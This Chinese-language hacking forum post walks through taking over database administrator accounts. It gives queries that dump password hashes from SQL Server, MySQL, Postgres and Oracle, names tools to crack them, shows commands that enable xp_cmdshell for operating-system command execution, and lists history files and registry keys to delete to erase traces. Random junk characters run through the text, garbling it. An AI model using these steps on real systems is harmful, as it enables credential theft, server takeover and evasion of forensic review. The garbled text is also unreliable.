;antian365.asp;antian365.jpg 2 c" L5 ^3 x+ R$ l% U3 E " J( ?' @& M) C' y各种类型数据库抓HASH破解最高权限密码! K$ C; `% I6 g$ Y1.sql server2000 ! u3 m* g. M+ f. \0 n( LSELECT password from master.dbo.sysxlogins where name='sa' 7 l2 D# V. G Y" t7 I0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341+ ^ S) u0 \0 Z
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A( B0 A8 n8 W* a3 J( A( h
3 x) d, X3 O1 G! I% Q' j0×0100- constant header 0 W7 c! r; s7 K$ t% s34767D5C- salt # y# Q; a" x2 j0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash & h9 d4 M: ^' v2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash- y# G$ ], G7 U
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash$ U$ l+ p' v' P1 q
SQL server 2005:- & J: O6 O- Q7 D( Y6 _SELECT password_hash FROM sys.sql_logins where name='sa' m; D) X' g) Q6 b' w2 |0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F + ^9 W2 [& z: S5 ~0×0100- constant header0 O# R' A" _7 o0 z% C
993BF231-salt 7 S9 G& @/ n! C& m2 s) D( @5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash 5 W0 o* x( R( E% T/ _6 Qcrack case sensitive hash in cain, try brute force and dictionary based attacks.: J6 b- `9 g$ q
+ {0 D# w2 o- p1 S+ q0 \update:- following bernardo’s comments:-3 [) g" c* C6 R+ w" o5 i1 |" y5 E
use function fn_varbintohexstr() to cast password in a hex string.. `2 K! W4 \( `1 @4 m& c
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins* h f- o, t3 C5 ^
. {5 b1 s: } T- H9 dMYSQL:- 0 N; M) Q. O& ^8 E N% a: G( x% y, _" c* m9 l2 H
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.' F# p& R6 H1 C* K& z
* z: G/ ^: L) w. E" G K
*mysql < 4.1 $ P$ `7 T& Z3 p$ | ( J# F# W' t( Imysql> SELECT PASSWORD(‘mypass’);! A2 o. Q# w) f# `4 P
+——————–+7 c" d6 U8 E6 m, `
| PASSWORD(‘mypass’) | 3 }: E3 F+ @5 t% U4 N+——————–+: v9 P8 {7 @2 n0 n6 M7 k: U
| 6f8c114b58f2ce9e |, f I a/ t$ g7 G
+——————–+ ^8 \- E, `+ C P- ?2 g; x( ~. S L*mysql >=4.1$ P ?" G1 ?: G' p
u- a, J7 r/ p |& l! r% V) j- Hmysql> SELECT PASSWORD(‘mypass’);1 f' W; h3 y6 m& i4 H6 \
+——————————————-+ 2 K) d: C7 C: T4 F# M| PASSWORD(‘mypass’) |, L& j+ M3 j5 G
+——————————————-+ z$ w' T. P- G/ A7 t| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |1 c( q$ M& N4 P/ R8 G8 b' v
+——————————————-+ $ t5 c+ k+ [* ^- U' W9 M! {9 l' z' t8 x7 t) o$ k9 t
Select user, password from mysql.user . k Y4 e. v& UThe hashes can be cracked in ‘cain and abel’$ w+ \& n8 W* J+ a; t1 J' K/ h
+ ?+ t& X/ b( |/ w dPostgres:- J/ _; z' x' G3 H3 ?Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) 5 }6 ~% F$ B5 S# ^7 P. Qselect usename, passwd from pg_shadow;1 [+ n- L# I3 f7 d( x
usename | passwd 6 L8 R% D# ?2 v* N; \/ U3 O2 o——————+————————————- & }' b: a) J& [/ W v: A$ Stestuser | md5fabb6d7172aadfda4753bf0507ed4396; X8 \8 Y. c! ^, o6 e) b: B" h
use mdcrack to crack these hashes:- ( U f2 j. p( h$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396" S# m/ N8 O8 F+ U
J' X. Z: n2 H3 ^% ?% d4 i9 L! yOracle:- ! `5 j( N% g6 I. \select name, password, spare4 from sys.user$' l6 t% C I1 x5 r" Z
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g ' p( ^" C h3 J5 [% D) |More on Oracle later, i am a bit bored…. * L0 _$ l* }7 p- ?8 o. B . ?+ e& m# i: S, ?2 n9 x; d" h- p% \/ W" H* B
在sql server2005/2008中开启xp_cmdshell1 s3 e* v6 L9 ~+ q% }
-- To allow advanced options to be changed. 4 v* I6 s0 Y: YEXEC sp_configure 'show advanced options', 1) ^* j% u: e# ?# m! R. o6 }
GO U4 Y- ?2 W* J. X-- To update the currently configured value for advanced options./ J/ A7 ?! r) Z4 ^/ _% m
RECONFIGURE / y9 F4 Y- v! QGO - v: Y$ m+ [/ u-- To enable the feature. 6 O6 k. E0 z4 d6 qEXEC sp_configure 'xp_cmdshell', 1 Z' w$ `- W/ i" B+ Q4 T7 Q
GO4 Z) z3 k$ B. k6 l& b, F3 f
-- To update the currently configured value for this feature., [ X5 O$ F7 ^( S
RECONFIGURE% {, L! v! I6 E; S, V. K
GO7 G: c K* T$ z& ^" k& V
SQL 2008 server日志清除,在清楚前一定要备份。 ' d1 c% a$ V" _2 U如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:. P" y+ Q0 ~$ Q# D
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin . i0 ?0 F3 R1 Y) V$ P9 G( e: _3 r; t( J8 T) E7 \5 h5 ~# }+ r
对于SQL Server 2008以前的版本:7 H/ H% g$ G8 o* w. {
SQL Server 2005: , R" i2 ~+ [) j删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat) b* ^, B+ z4 N$ k7 p
SQL Server 2000:6 W9 ^8 n' e7 R4 c
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。 8 P/ _' M4 l0 c4 R5 f& ` & q* ?8 f# @6 L" r4 |3 \# I本帖最后由 simeon 于 2013-1-3 09:51 编辑 l F" k+ z8 m